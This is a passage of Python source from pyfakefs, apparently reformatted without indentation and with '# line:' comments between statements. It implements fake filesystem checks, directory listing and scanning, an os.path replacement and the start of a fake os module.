if ((not exist_ok) or (not isinstance(self.ResolveObject(dir_name), FakeDirectory))):
# line: 2420
if isinstance(e, OSError):
# line: 2421
raise
# line: 2422
raise OSError(e.errno, e.strerror, e.filename)
# line: 2424
def _IsType(self, path, st_flag, follow_symlinks=True):
# line: 2438
"Helper function to implement isdir(), islink(), etc.\n\n See the stat(2) man page for valid stat.S_I* flag values\n\n Args:\n path: path to file to stat and test\n st_flag: the stat.S_I* flag checked for the file's st_mode\n\n Returns:\n boolean (the st_flag is set in path's st_mode)\n\n Raises:\n TypeError: if path is None\n "
# line: 2439
if (sys.version_info >= (3, 6)):
# line: 2440
path = os.fspath(path)
# line: 2441
if (path is None):
# line: 2442
raise TypeError
# line: 2443
try:
# line: 2444
obj = self.ResolveObject(path, follow_symlinks)
# line: 2445
if obj:
# line: 2446
return (stat.S_IFMT(obj.st_mode) == st_flag)
# line: 2447
except (IOError, OSError):
# line: 2448
return False
# line: 2449
return False
# line: 2451
def IsDir(self, path, follow_symlinks=True):
# line: 2463
'Determine if path identifies a directory.\n New in pyfakefs 3.0.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a directory (following symlinks).\n\n Raises:\n TypeError: if path is None.\n '
# line: 2464
return self._IsType(path, stat.S_IFDIR, follow_symlinks)
# line: 2466
def IsFile(self, path, follow_symlinks=True):
# line: 2478
'Determine if path identifies a regular file.\n New in pyfakefs 3.0.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a regular file (following symlinks).\n\n Raises:\n TypeError: if path is None.\n '
# line: 2479
return self._IsType(path, stat.S_IFREG, follow_symlinks)
# line: 2481
def IsLink(self, path):
# line: 2493
'Determine if path identifies a symbolic link.\n New in pyfakefs 3.0.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a symlink (S_IFLNK set in st_mode)\n\n Raises:\n TypeError: if path is None.\n '
# line: 2494
return self._IsType(path, stat.S_IFLNK, follow_symlinks=False)
# line: 2496
def ConfirmDir(self, target_directory):
# line: 2508
'Test that the target is actually a directory, raising OSError if not.\n New in pyfakefs 3.0.\n\n Args:\n target_directory: path to the target directory within the fake filesystem.\n\n Returns:\n the FakeDirectory object corresponding to target_directory.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 2509
try:
# line: 2510
directory = self.ResolveObject(target_directory)
# line: 2511
except IOError as exc:
# line: 2512
raise OSError(exc.errno, exc.strerror, target_directory)
# line: 2513
if (not (directory.st_mode & stat.S_IFDIR)):
# line: 2514
raise OSError(errno.ENOTDIR, 'Fake os module: not a directory', target_directory)
# line: 2517
return directory
# line: 2519
def RemoveFile(self, path):
# line: 2530
'Remove the FakeFile object at the specified file path.\n New in pyfakefs 3.0.\n\n Args:\n path: path to file to be removed.\n\n Raises:\n OSError: if path points to a directory.\n OSError: if path does not exist.\n OSError: if removal failed.\n '
# line: 2531
path = self.NormalizePath(path)
# line: 2532
if self.Exists(path):
# line: 2533
obj = self.ResolveObject(path)
# line: 2534
if (stat.S_IFMT(obj.st_mode) == stat.S_IFDIR):
# line: 2535
link_obj = self.LResolveObject(path)
# line: 2536
if (stat.S_IFMT(link_obj.st_mode) != stat.S_IFLNK):
# line: 2537
raise OSError(errno.EISDIR, ("Is a directory: '%s'" % path))
# line: 2539
try:
# line: 2540
self.RemoveObject(path)
# line: 2541
except IOError as exc:
# line: 2542
raise OSError(exc.errno, exc.strerror, exc.filename)
# line: 2544
def RemoveDirectory(self, target_directory, allow_symlink=False):
# line: 2557
"Remove a leaf Fake directory.\n New in pyfakefs 3.0.\n\n Args:\n target_directory: (str) Name of directory to remove.\n allow_symlink: (bool) if `target_directory` is a symlink,\n the function just returns, otherwise it raises (Posix only)\n\n Raises:\n OSError: if target_directory does not exist.\n OSError: if target_directory does not point to a directory.\n OSError: if removal failed per FakeFilesystem.RemoveObject. Cannot remove '.'.\n "
# line: 2558
if (target_directory in ('.', u'.')):
# line: 2559
raise OSError(errno.EINVAL, "Invalid argument: '.'")
# line: 2560
target_directory = self.NormalizePath(target_directory)
# line: 2561
if self.ConfirmDir(target_directory):
# line: 2562
if ((not self.is_windows_fs) and self.IsLink(target_directory)):
# line: 2563
if allow_symlink:
# line: 2564
return
# line: 2565
raise OSError(errno.ENOTDIR, 'Cannot remove symlink', target_directory)
# line: 2567
dir_object = self.ResolveObject(target_directory)
# line: 2568
if dir_object.contents:
# line: 2569
raise OSError(errno.ENOTEMPTY, 'Fake Directory not empty', target_directory)
# line: 2571
try:
# line: 2572
self.RemoveObject(target_directory)
# line: 2573
except IOError as exc:
# line: 2574
raise OSError(exc.errno, exc.strerror, exc.filename)
# line: 2576
def ListDir(self, target_directory):
# line: 2588
'Return a list of file names in target_directory.\n New in pyfakefs 3.0.\n\n Args:\n target_directory: path to the target directory within the fake filesystem.\n\n Returns:\n a list of file names within the target directory in arbitrary order.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 2589
target_directory = self.ResolvePath(target_directory, allow_fd=True)
# line: 2590
directory = self.ConfirmDir(target_directory)
# line: 2591
directory_contents = directory.contents
# line: 2592
return list(directory_contents.keys())
# line: 2594
if (sys.version_info >= (3, 5)):
# line: 2595
class DirEntry:
# line: 2596
'Emulates os.DirEntry. Note that we did not enforce keyword only arguments.'
# line: 2598
def __init__(self, filesystem):
# line: 2603
'Initialize the dir entry with unset values.\n\n Args:\n filesystem: the fake filesystem used for implementation.\n '
# line: 2604
self._filesystem = filesystem
# line: 2605
self.name = ''
# line: 2606
self.path = ''
# line: 2607
self._inode = None
# line: 2608
self._islink = False
# line: 2609
self._isdir = False
# line: 2610
self._statresult = None
# line: 2611
self._statresult_symlink = None
# line: 2613
def inode(self):
# line: 2614
'Return the inode number of the entry.'
# line: 2615
if (self._inode is None):
# line: 2616
self.stat(follow_symlinks=False)
# line: 2617
return self._inode
# line: 2619
def is_dir(self, follow_symlinks=True):
# line: 2629
'Return True if this entry is a directory entry.\n\n Args:\n follow_symlinks: If True, also return True if this entry is a symlink\n pointing to a directory.\n\n Returns:\n True if this entry is an existing directory entry, or if\n follow_symlinks is set, and this entry points to an existing directory entry.\n '
# line: 2630
return (self._isdir and (follow_symlinks or (not self._islink)))
# line: 2632
def is_file(self, follow_symlinks=True):
# line: 2642
'Return True if this entry is a regular file entry.\n\n Args:\n follow_symlinks: If True, also return True if this entry is a symlink\n pointing to a regular file.\n\n Returns:\n True if this entry is an existing file entry, or if\n follow_symlinks is set, and this entry points to an existing file entry.\n '
# line: 2643
return ((not self._isdir) and (follow_symlinks or (not self._islink)))
# line: 2645
def is_symlink(self):
# line: 2646
'Return True if this entry is a symbolic link (even if broken).'
# line: 2647
return self._islink
# line: 2649
def stat(self, follow_symlinks=True):
# line: 2655
'Return a stat_result object for this entry.\n\n Args:\n follow_symlinks: If False and the entry is a symlink, return the\n result for the symlink, otherwise for the object it points to.\n '
# line: 2656
if follow_symlinks:
# line: 2657
if (self._statresult_symlink is None):
# line: 2658
file_object = self._filesystem.ResolveObject(self.path)
# line: 2659
if self._filesystem.is_windows_fs:
# line: 2662
file_object.st_ino = 0
# line: 2663
file_object.st_dev = 0
# line: 2664
file_object.st_nlink = 0
# line: 2665
self._statresult_symlink = file_object.stat_result.copy()
# line: 2666
return self._statresult_symlink
# line: 2668
if (self._statresult is None):
# line: 2669
file_object = self._filesystem.LResolveObject(self.path)
# line: 2670
self._inode = file_object.st_ino
# line: 2671
if self._filesystem.is_windows_fs:
# line: 2672
file_object.st_ino = 0
# line: 2673
file_object.st_dev = 0
# line: 2674
file_object.st_nlink = 0
# line: 2675
self._statresult = file_object.stat_result.copy()
# line: 2676
return self._statresult
# line: 2678
class ScanDirIter:
# line: 2681
'Iterator for DirEntry objects returned from `scandir()` function.\n New in pyfakefs 3.0.\n '
# line: 2683
def __init__(self, filesystem, path):
# line: 2684
self.filesystem = filesystem
# line: 2685
self.path = self.filesystem.ResolvePath(path)
# line: 2686
contents = {}
# line: 2687
try:
# line: 2688
contents = self.filesystem.ConfirmDir(path).contents
# line: 2689
except OSError:
# line: 2690
pass
# line: 2691
self.contents_iter = iter(contents)
# line: 2693
def __iter__(self):
# line: 2694
return self
# line: 2696
def __next__(self):
# line: 2697
entry = self.contents_iter.__next__()
# line: 2698
dir_entry = self.filesystem.DirEntry(self.filesystem)
# line: 2699
dir_entry.name = entry
# line: 2700
dir_entry.path = self.filesystem.JoinPaths(self.path, dir_entry.name)
# line: 2701
dir_entry._isdir = self.filesystem.IsDir(dir_entry.path)
# line: 2702
dir_entry._islink = self.filesystem.IsLink(dir_entry.path)
# line: 2703
return dir_entry
# line: 2705
if (sys.version_info >= (3, 6)):
# line: 2706
def __enter__(self):
# line: 2707
return self
# line: 2709
def __exit__(self, exc_type, exc_val, exc_tb):
# line: 2710
self.close()
# line: 2712
def close(self):
# line: 2713
pass
# line: 2715
def ScanDir(self, path=''):
# line: 2728
'Return an iterator of DirEntry objects corresponding to the entries\n in the directory given by path.\n New in pyfakefs 3.0.\n\n Args:\n path: path to the target directory within the fake filesystem.\n\n Returns:\n an iterator to an unsorted list of os.DirEntry objects for each entry in path.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 2729
return self.ScanDirIter(self, path)
# line: 2731
def __str__(self):
# line: 2732
return str(self.root)
# line: 2735
class FakePathModule(object):
# line: 2740
'Faked os.path module replacement.\n\n FakePathModule should *only* be instantiated by FakeOsModule. See the\n FakeOsModule docstring for details.\n '
# line: 2741
_OS_PATH_COPY = CopyModule(os.path)
# line: 2743
def __init__(self, filesystem, os_module=None):
# line: 2749
'Init.\n\n Args:\n filesystem: FakeFilesystem used to provide file system information\n os_module: (deprecated) FakeOsModule to assign to self.os\n '
# line: 2750
self.filesystem = filesystem
# line: 2751
self._os_path = self._OS_PATH_COPY
# line: 2752
if (os_module is None):
# line: 2753
warnings.warn(FAKE_PATH_MODULE_DEPRECATION, DeprecationWarning, stacklevel=2)
# line: 2755
self._os_path.os = self.os = os_module
# line: 2756
self.sep = self.filesystem.path_separator
# line: 2757
self.altsep = self.filesystem.alternative_path_separator
# line: 2759
def exists(self, path):
# line: 2767
'Determine whether the file object exists within the fake filesystem.\n\n Args:\n path: path to the file object.\n\n Returns:\n bool (if file exists).\n '
# line: 2768
return self.filesystem.Exists(path)
# line: 2770
def lexists(self, path):
# line: 2778
'Test whether a path exists. Returns True for broken symbolic links.\n\n Args:\n path: path to the symlink object.\n\n Returns:\n bool (if file exists).\n '
# line: 2779
return (self.exists(path) or self.islink(path))
# line: 2781
def getsize(self, path):
# line: 2789
'Return the file object size in bytes.\n\n Args:\n path: path to the file object.\n\n Returns:\n file size in bytes.\n '
# line: 2790
try:
# line: 2791
file_obj = self.filesystem.ResolveObject(path)
# line: 2792
return file_obj.st_size
# line: 2793
except IOError as exc:
# line: 2794
raise os.error(exc.errno, exc.strerror)
# line: 2796
def isabs(self, path):
# line: 2797
'Return True if path is an absolute pathname.'
# line: 2798
if self.filesystem.is_windows_fs:
# line: 2799
path = self.splitdrive(path)[1]
# line: 2800
if (sys.version_info >= (3, 6)):
# line: 2801
path = os.fspath(path)
# line: 2802
sep = self.filesystem._path_separator(path)
# line: 2803
altsep = self.filesystem._alternative_path_separator(path)
# line: 2804
if self.filesystem.is_windows_fs:
# line: 2805
return ((len(path) > 0) and (path[:1] in (sep, altsep)))
else:
# line: 2807
return (path.startswith(sep) or ((altsep is not None) and path.startswith(altsep)))
# line: 2809
def isdir(self, path):
# line: 2810
'Determine if path identifies a directory.'
# line: 2811
return self.filesystem.IsDir(path)
# line: 2813
def isfile(self, path):
# line: 2814
'Determine if path identifies a regular file.'
# line: 2815
return self.filesystem.IsFile(path)
# line: 2817
def islink(self, path):
# line: 2828
'Determine if path identifies a symbolic link.\n\n Args:\n path: path to filesystem object.\n\n Returns:\n True if path points to a symbolic link.\n\n Raises:\n TypeError: if path is None.\n '
# line: 2829
return self.filesystem.IsLink(path)
# line: 2831
def getmtime(self, path):
# line: 2843
'Returns the modification time of the fake file.\n\n Args:\n path: the path to fake file.\n\n Returns:\n (int, float) the modification time of the fake file\n in number of seconds since the epoch.\n\n Raises:\n OSError: if the file does not exist.\n '
# line: 2844
try:
# line: 2845
file_obj = self.filesystem.ResolveObject(path)
# line: 2846
except IOError as exc:
# line: 2847
raise OSError(errno.ENOENT, str(exc))
# line: 2848
return file_obj.st_mtime
# line: 2850
def getatime(self, path):
# line: 2863
'Returns the last access time of the fake file.\n\n Note: Access time is not set automatically in fake filesystem on access.\n\n Args:\n path: the path to fake file.\n\n Returns:\n (int, float) the access time of the fake file in number of seconds since the epoch.\n\n Raises:\n OSError: if the file does not exist.\n '
# line: 2864
try:
# line: 2865
file_obj = self.filesystem.ResolveObject(path)
# line: 2866
except IOError as exc:
# line: 2867
raise OSError(errno.ENOENT, str(exc))
# line: 2868
return file_obj.st_atime
# line: 2870
def getctime(self, path):
# line: 2881
'Returns the creation time of the fake file.\n\n Args:\n path: the path to fake file.\n\n Returns:\n (int, float) the creation time of the fake file in number of seconds since the epoch.\n\n Raises:\n OSError: if the file does not exist.\n '
# line: 2882
try:
# line: 2883
file_obj = self.filesystem.ResolveObject(path)
# line: 2884
except IOError as exc:
# line: 2885
raise OSError(errno.ENOENT, str(exc))
# line: 2886
return file_obj.st_ctime
# line: 2888
def abspath(self, path):
# line: 2889
'Return the absolute version of a path.'
# line: 2891
def getcwd():
# line: 2892
'Return the current working directory.'
# line: 2894
if ((sys.version_info < (3,)) and isinstance(path, unicode)):
# line: 2895
return self.os.getcwdu()
elif ((sys.version_info >= (3,)) and isinstance(path, bytes)):
# line: 2897
return self.os.getcwdb()
else:
# line: 2899
return self.os.getcwd()
# line: 2901
if (sys.version_info >= (3, 6)):
# line: 2902
path = os.fspath(path)
# line: 2904
sep = self.filesystem._path_separator(path)
# line: 2905
altsep = self.filesystem._alternative_path_separator(path)
# line: 2906
if (not self.isabs(path)):
# line: 2907
path = self.join(getcwd(), path)
elif ((self.filesystem.is_windows_fs and path.startswith(sep)) or ((altsep is not None) and path.startswith(altsep))):
# line: 2911
cwd = getcwd()
# line: 2912
if self.filesystem.StartsWithDriveLetter(cwd):
# line: 2913
path = self.join(cwd[:2], path)
# line: 2914
return self.normpath(path)
# line: 2916
def join(self, *p):
# line: 2917
'Return the completed path with a separator of the parts.'
# line: 2918
return self.filesystem.JoinPaths(*p)
# line: 2920
def split(self, path):
# line: 2923
'Split the path into the directory and the filename of the path.\n New in pyfakefs 3.0.\n '
# line: 2924
return self.filesystem.SplitPath(path)
# line: 2926
def splitdrive(self, path):
# line: 2929
'Split the path into the drive part and the rest of the path, if supported.\n New in pyfakefs 2.9.\n '
# line: 2930
return self.filesystem.SplitDrive(path)
# line: 2932
def normpath(self, path):
# line: 2933
'Normalize path, eliminating double slashes, etc.'
# line: 2934
return self.filesystem.CollapsePath(path)
# line: 2936
def normcase(self, path):
# line: 2939
'Convert to lower case under windows, replaces additional path separator.\n New in pyfakefs 2.9.\n '
# line: 2940
path = self.filesystem.NormalizePathSeparator(path)
# line: 2941
if self.filesystem.is_windows_fs:
# line: 2942
path = path.lower()
# line: 2943
return path
# line: 2945
def relpath(self, path, start=None):
# line: 2946
'We mostly rely on the native implementation and adapt the path separator.'
# line: 2947
if (not path):
# line: 2948
raise ValueError('no path specified')
# line: 2949
if (sys.version_info >= (3, 6)):
# line: 2950
path = os.fspath(path)
# line: 2951
if (start is not None):
# line: 2952
start = os.fspath(start)
# line: 2953
if (start is None):
# line: 2954
start = self.filesystem.cwd
# line: 2955
if (self.filesystem.alternative_path_separator is not None):
# line: 2956
path = path.replace(self.filesystem.alternative_path_separator, self._os_path.sep)
# line: 2957
start = start.replace(self.filesystem.alternative_path_separator, self._os_path.sep)
# line: 2958
path = path.replace(self.filesystem.path_separator, self._os_path.sep)
# line: 2959
start = start.replace(self.filesystem.path_separator, self._os_path.sep)
# line: 2960
path = self._os_path.relpath(path, start)
# line: 2961
return path.replace(self._os_path.sep, self.filesystem.path_separator)
# line: 2963
def realpath(self, filename):
# line: 2967
'Return the canonical path of the specified filename, eliminating any\n symbolic links encountered in the path.\n New in pyfakefs 3.0.\n '
# line: 2968
if self.filesystem.is_windows_fs:
# line: 2969
return self.abspath(filename)
# line: 2970
if (sys.version_info >= (3, 6)):
# line: 2971
filename = os.fspath(filename)
# line: 2972
(path, ok) = self._joinrealpath(filename[:0], filename, {})
# line: 2973
return self.abspath(path)
# line: 2975
if ((sys.platform != 'win32') or (sys.version_info >= (3, 2))):
# line: 2976
def samefile(self, path1, path2):
# line: 2987
'Return whether path1 and path2 point to the same file.\n Windows support new in Python 3.2.\n New in pyfakefs 3.3.\n\n Args:\n path1: first file path or path object (Python >=3.6)\n path2: second file path or path object (Python >=3.6)\n\n Raises:\n OSError: if one of the paths does not point to an existing file system object.\n '
# line: 2988
stat1 = self.filesystem.GetStat(path1)
# line: 2989
stat2 = self.filesystem.GetStat(path2)
# line: 2990
return ((stat1.st_ino == stat2.st_ino) and (stat1.st_dev == stat2.st_dev))
# line: 2992
def _joinrealpath(self, path, rest, seen):
# line: 2996
'Join two paths, normalizing and eliminating any symbolic links\n encountered in the second path.\n Taken from Python source and adapted.\n '
# line: 2997
curdir = self.filesystem._matching_string(path, '.')
# line: 2998
pardir = self.filesystem._matching_string(path, '..')
# line: 3000
sep = self.filesystem._path_separator(path)
# line: 3001
if self.isabs(rest):
# line: 3002
rest = rest[1:]
# line: 3003
path = sep
# line: 3005
while rest:
# line: 3006
(name, _, rest) = rest.partition(sep)
# line: 3007
if ((not name) or (name == curdir)):
# line: 3009
continue
# line: 3010
if (name == pardir):
# line: 3012
if path:
# line: 3013
(path, name) = self.filesystem.SplitPath(path)
# line: 3014
if (name == pardir):
# line: 3015
path = self.filesystem.JoinPaths(path, pardir, pardir)
else:
# line: 3017
path = pardir
# line: 3018
continue
# line: 3019
newpath = self.filesystem.JoinPaths(path, name)
# line: 3020
if (not self.filesystem.IsLink(newpath)):
# line: 3021
path = newpath
# line: 3022
continue
# line: 3024
if (newpath in seen):
# line: 3026
path = seen[newpath]
# line: 3027
if (path is not None):
# line: 3029
continue
# line: 3032
return (self.filesystem.JoinPaths(newpath, rest), False)
# line: 3033
seen[newpath] = None
# line: 3034
(path, ok) = self._joinrealpath(path, self.filesystem.ReadLink(newpath), seen)
# line: 3035
if (not ok):
# line: 3036
return (self.filesystem.JoinPaths(path, rest), False)
# line: 3037
seen[newpath] = path
# line: 3038
return (path, True)
# line: 3040
def dirname(self, path):
# line: 3043
'Returns the first part of the result of `split()`.\n New in pyfakefs 3.0.\n '
# line: 3044
return self.split(path)[0]
# line: 3046
def expanduser(self, path):
# line: 3049
"Return the argument with an initial component of ~ or ~user\n replaced by that user's home directory.\n "
# line: 3050
return self._os_path.expanduser(path).replace(self._os_path.sep, self.sep)
# line: 3052
def ismount(self, path):
# line: 3062
'Return true if the given path is a mount point.\n New in pyfakefs 2.9.\n\n Args:\n path: path to filesystem object to be checked\n\n Returns:\n True if path is a mount point added to the fake file system.\n Under Windows also returns True for drive and UNC roots (independent of their existence).\n '
# line: 3063
if (sys.version_info >= (3, 6)):
# line: 3064
path = os.fspath(path)
# line: 3065
if (not path):
# line: 3066
return False
# line: 3067
normed_path = self.filesystem.NormalizePath(path)
# line: 3068
sep = self.filesystem._path_separator(path)
# line: 3069
if self.filesystem.is_windows_fs:
# line: 3070
if (self.filesystem.alternative_path_separator is not None):
# line: 3071
path_seps = (sep, self.filesystem._alternative_path_separator(path))
else:
# line: 3075
path_seps = (sep,)
# line: 3076
(drive, rest) = self.filesystem.SplitDrive(normed_path)
# line: 3077
if (drive and (drive[:1] in path_seps)):
# line: 3078
return ((not rest) or (rest in path_seps))
# line: 3079
if (rest in path_seps):
# line: 3080
return True
# line: 3081
for mount_point in self.filesystem.mount_points:
# line: 3082
if (normed_path.rstrip(sep) == mount_point.rstrip(sep)):
# line: 3083
return True
# line: 3084
return False
# line: 3086
if (sys.version_info < (3, 0)):
# line: 3087
def walk(self, top, func, arg):
# line: 3095
'Directory tree walk with callback function.\n New in pyfakefs 3.0.\n\n Args:\n top: root path to traverse. The root itself is not included in the called elements.\n func: function to be called for each visited path node.\n arg: first argument to be called with func (apart from dirname and filenames).\n '
# line: 3096
try:
# line: 3097
names = self.filesystem.ListDir(top)
# line: 3098
except os.error:
# line: 3099
return
# line: 3100
func(arg, top, names)
# line: 3101
for name in names:
# line: 3102
name = self.filesystem.JoinPaths(top, name)
# line: 3103
if self.filesystem.is_windows_fs:
# line: 3104
if self.filesystem.IsDir(name):
# line: 3105
self.walk(name, func, arg)
else:
# line: 3107
try:
# line: 3108
st = self.filesystem.GetStat(name, follow_symlinks=False)
# line: 3109
except os.error:
# line: 3110
continue
# line: 3111
if stat.S_ISDIR(st.st_mode):
# line: 3112
self.walk(name, func, arg)
# line: 3114
def __getattr__(self, name):
# line: 3115
'Forwards any non-faked calls to the real os.path.'
# line: 3116
return getattr(self._os_path, name)
# line: 3119
class FakeOsModule(object):
# line: 3130
'Uses FakeFilesystem to provide a fake os module replacement.\n\n Do not create os.path separately from os, as there is a necessary circular\n dependency between os and os.path to replicate the behavior of the standard\n Python modules. What you want to do is to just let FakeOsModule take care of\n os.path setup itself.\n\n # You always want to do this.\n filesystem = fake_filesystem.FakeFilesystem()\n my_os_module = fake_filesystem.FakeOsModule(filesystem)\n '
# line: 3132
_stat_float_times = (sys.version_info >= (2, 5))
# line: 3134
def __init__(self, filesystem, os_path_module=None):
# line: 3140
'Also exposes self.path (to fake os.path).\n\n Args:\n filesystem: FakeFilesystem used to provide file system information\n os_path_module: (deprecated) optional FakePathModule instance\n '
# line: 3141
self.filesystem = filesystem
# line: 3142
self.sep = filesystem.path_separator
# line: 3143
self.altsep = filesystem.alternative_path_separator
# line: 3144
self._os_module = os
# line: 3145
if (os_path_module is None):
# line: 3146
self.path = FakePathModule(self.filesystem, self)
else:
# line: 3148
warnings.warn(FAKE_PATH_MODULE_DEPRECATION, DeprecationWarning, stacklevel=2)
# line: 3150
self.path = os_path_module
# line: 3151
if (sys.version_info < (3, 0)):
# line: 3152
self.fdopen = self._fdopen_ver2
else:
# line: 3154
self.fdopen = self._fdopen
# line: 3156
def _fdopen(self, *args, **kwargs):
# line: 3168
'Redirector to open() builtin function.\n\n Args:\n *args: pass through args\n **kwargs: pass through kwargs\n\n Returns:\n File object corresponding to file_des.\n\n Raises:\n TypeError: if file descriptor is not an integer.\n '
# line: 3169
if (not isinstance(args[0], int)):
# line: 3170
raise TypeError('an integer is required')
# line: 3171
return FakeFileOpen(self.filesystem)(*args, **kwargs)
# line: 3173
def _fdopen_ver2(self, file_des, mode='r', bufsize=None):
# line: 3188
'Returns an open file object connected to the file descriptor file_des.\n\n Args:\n file_des: An integer file descriptor for the file object requested.\n mode: additional file flags. Currently checks to see if the mode matches\n the mode of the requested file object.\n bufsize: ignored. (Used for signature compliance with __builtin__.fdopen)\n\n Returns:\n File object corresponding to file_des.\n\n Raises:\n OSError: if bad file descriptor or incompatible mode is given.\n TypeError: if file descriptor is not an integer.\n '
# line: 3189
if (not isinstance(file_des, int)):
# line: 3190
raise TypeError('an integer is required')
# line: 3192
try:
# line: 3193
return FakeFileOpen(self.filesystem).Call(file_des, mode=mode)
# line: 3194
except IOError as exc:
# line: 3195
raise OSError(exc)
# line: 3197
def _umask(self):
# line: 3198
'Return the current umask.'
# line: 3199
if self.filesystem.is_windows_fs:
# line: 3201
return 0
# line: 3202
if (sys.platform == 'win32'):
# line: 3204
return 2
else:
# line: 3209
mask = os.umask(0)
# line: 3210
os.umask(mask)
# line: 3211
return mask
# line: 3214
def open(self, file_path, flags, mode=None, dir_fd=None):
# line: 3233
'Return the file descriptor for a FakeFile.\n\n Args:\n file_path: the path to the file\n flags: low-level bits to indicate io operation\n mode: bits to define default permissions\n Note: only basic modes are supported, OS-specific modes are ignored\n dir_fd: If not `None`, the file descriptor of a directory,\n with `file_path` being relative to this directory.\n New in Python 3.3. New in pyfakefs 3.3.\n\n Returns:\n A file descriptor.\n\n Raises:\n IOError: if the path cannot be found\n ValueError: if invalid mode is given\n NotImplementedError: if `os.O_EXCL` is used without `os.O_CREAT`\n '
# line: 3234
file_path = self._path_with_dir_fd(file_path, self.open, dir_fd)
# line: 3235
if (mode is None):
# line: 3236
if self.filesystem.is_windows_fs:
# line: 3237
mode = 438
else:
# line: 3239
mode = (511 & (~ self._umask()))
# line: 3241
open_modes = _OpenModes(must_exist=(not (flags & os.O_CREAT)), can_read=(not (flags & os.O_WRONLY)), can_write=(flags & (os.O_RDWR | os.O_WRONLY)), truncate=(flags & os.O_TRUNC), append=(flags & os.O_APPEND), must_not_exist=(flags & os.O_EXCL))
# line: 3249
if (open_modes.must_not_exist and open_modes.must_exist):
# line: 3250
raise NotImplementedError('O_EXCL without O_CREAT mode is not supported')
# line: 3252
if ((not self.filesystem.is_windows_fs) and (not open_modes.can_write) and self.filesystem.Exists(file_path)):
# line: 3256
obj = self.filesystem.ResolveObject(file_path)
# line: 3257
if isinstance(obj, FakeDirectory):
# line: 3258
dir_wrapper = FakeDirWrapper(obj, file_path, self.filesystem)
# line: 3259
file_des = self.filesystem.AddOpenFile(dir_wrapper)
# line: 3260
dir_wrapper.filedes = file_des
# line: 3261
return file_des
# line: 3264
str_flags = 'b'
# line: 3265
delete_on_close = False
# line: 3266
if hasattr(os, 'O_TEMPORARY'):
# line: 3267
delete_on_close = ((flags & os.O_TEMPORARY) == os.O_TEMPORARY)
# line: 3268
fake_file = FakeFileOpen(self.filesystem, delete_on_close=delete_on_close, raw_io=True)(file_path, str_flags, open_modes=open_modes)
# line: 3271
self.chmod(file_path, mode)
# line: 3272
return fake_file.fileno()
# line: 3274
def close(self, file_des):
# line: 3283
'Close a file descriptor.\n\n Args:\n file_des: An integer file descriptor for the file object requested.\n\n Raises:\n OSError: bad file descriptor.\n TypeError: if file descriptor is not an integer.\n '
# line: 3284
file_handle = self.filesystem.GetOpenFile(file_des)
# line: 3285
file_handle.close()
# line: 3287
def read(self, file_des, num_bytes):
# line: 3300
'Read number of bytes from a file descriptor, returns bytes read.\n\n Args:\n file_des: An integer file descriptor for the file object requested.\n num_bytes: Number of bytes to read from file.\n\n Returns:\n Bytes read from file.\n\n Raises:\n OSError: bad file descriptor.\n TypeError: if file descriptor is not an integer.\n '
# line: 3301
file_handle = self.filesystem.GetOpenFile(file_des)
# line: 3302
file_handle.raw_io = True
# line: 3303
return file_handle.read(num_bytes)
# line: 3305
def write(self, file_des, contents):
# line: 3318
'Write string to file descriptor, returns number of bytes written.\n\n Args:\n file_des: An integer file descriptor for the file object requested.\n contents: String of bytes to write to file.\n\n Returns:\n Number of bytes written.\n\n Raises:\n OSError: bad file descriptor.\n TypeError: if file descriptor is not an integer.\n '
# line: 3319
file_handle = self.filesystem.GetOpenFile(file_des)
# line: 3320
file_handle.raw_io = True
# line: 3321
file_handle._sync_io()
# line: 3322
file_handle.write(contents)
# line: 3323
file_handle.flush()
# line: 3324
return len(contents)
# line: 3326
@classmethod
# line: 3326
def stat_float_times(cls, newvalue=None):
# line: 3337
"Determine whether a file's time stamps are reported as floats or ints.\n New in pyfakefs 2.9.\n\n Calling without arguments returns the current value. The value is shared\n by all instances of FakeOsModule.\n\n Args:\n newvalue: if True, mtime, ctime, atime are reported as floats.\n Else, as ints (rounding down).\n "
# line: 3338
if (newvalue is not None):
# line: 3339
cls._stat_float_times = bool(newvalue)
# line: 3340
return cls._stat_float_times
# line: 3342
def fstat(self, file_des):
# line: 3353
"Return the os.stat-like tuple for the FakeFile object of file_des.\n\n Args:\n file_des: file descriptor of filesystem object to retrieve.\n\n Returns:\n the FakeStatResult object corresponding to entry_path.\n\n Raises:\n OSError: if the filesystem object doesn't exist.\n "
# line: 3355
file_object = self.filesystem.GetOpenFile(file_des).GetObject()
# line: 3356
return file_object.stat_result.copy()
# line: 3358
def umask(self, new_mask):
# line: 3369
'Change the current umask.\n\n Args:\n new_mask: An integer.\n\n Returns:\n The old mask.\n\n Raises:\n TypeError: new_mask is of an invalid type.\n '
# line: 3370
if (not isinstance(new_mask, int)):
# line: 3371
raise TypeError('an integer is required')
# line: 3372
old_umask = self.filesystem.umask
# line: 3373
self.filesystem.umask = new_mask
# line: 3374
return old_umask
# line: 3376
def chdir(self, target_directory):
# line: 3385
'Change current working directory to target directory.\n\n Args:\n target_directory: path to new current working directory.\n\n Raises:\n OSError: if user lacks permission to enter the argument directory or if\n the target is not a directory\n '
# line: 3386
target_directory = self.filesystem.ResolvePath(target_directory, allow_fd=True)
# line: 3387
self.filesystem.ConfirmDir(target_directory)
# line: 3388
directory = self.filesystem.ResolveObject(target_directory)
# line: 3390
if (not (directory.st_mode | PERM_EXE)):
# line: 3391
raise OSError(errno.EACCES, 'Fake os module: permission denied', directory)
# line: 3393
self.filesystem.cwd = target_directory
# line: 3395
def getcwd(self):
# line: 3396
'Return current working directory.'
# line: 3397
return self.filesystem.cwd
# line: 3399
if (sys.version_info < (3,)):
# line: 3400
def getcwdu(self):
# line: 3401
'Return current working directory as unicode. Python 2 only.'
# line: 3402
return unicode(self.filesystem.cwd)
else:
# line: 3405
def getcwdb(self):
# line: 3406
'Return current working directory as bytes. Python 3 only.'
# line: 3407
return bytes(self.filesystem.cwd, locale.getpreferredencoding(False))
# line: 3409
def listdir(self, target_directory):
# line: 3421
'Return a list of file names in target_directory.\n\n Args:\n target_directory: path to the target directory within the fake\n filesystem.\n\n Returns:\n a list of file names within the target directory in arbitrary order.\n\n Raises:\n OSError: if the target is not a directory.\n '
# line: 3422
return self.filesystem.ListDir(target_directory)
# line: 3424
if (sys.platform.startswith('linux') and (sys.version_info >= (3, 3))):
# line: 3425
def listxattr(self, path=None, follow_symlinks=True):
# line: 3426
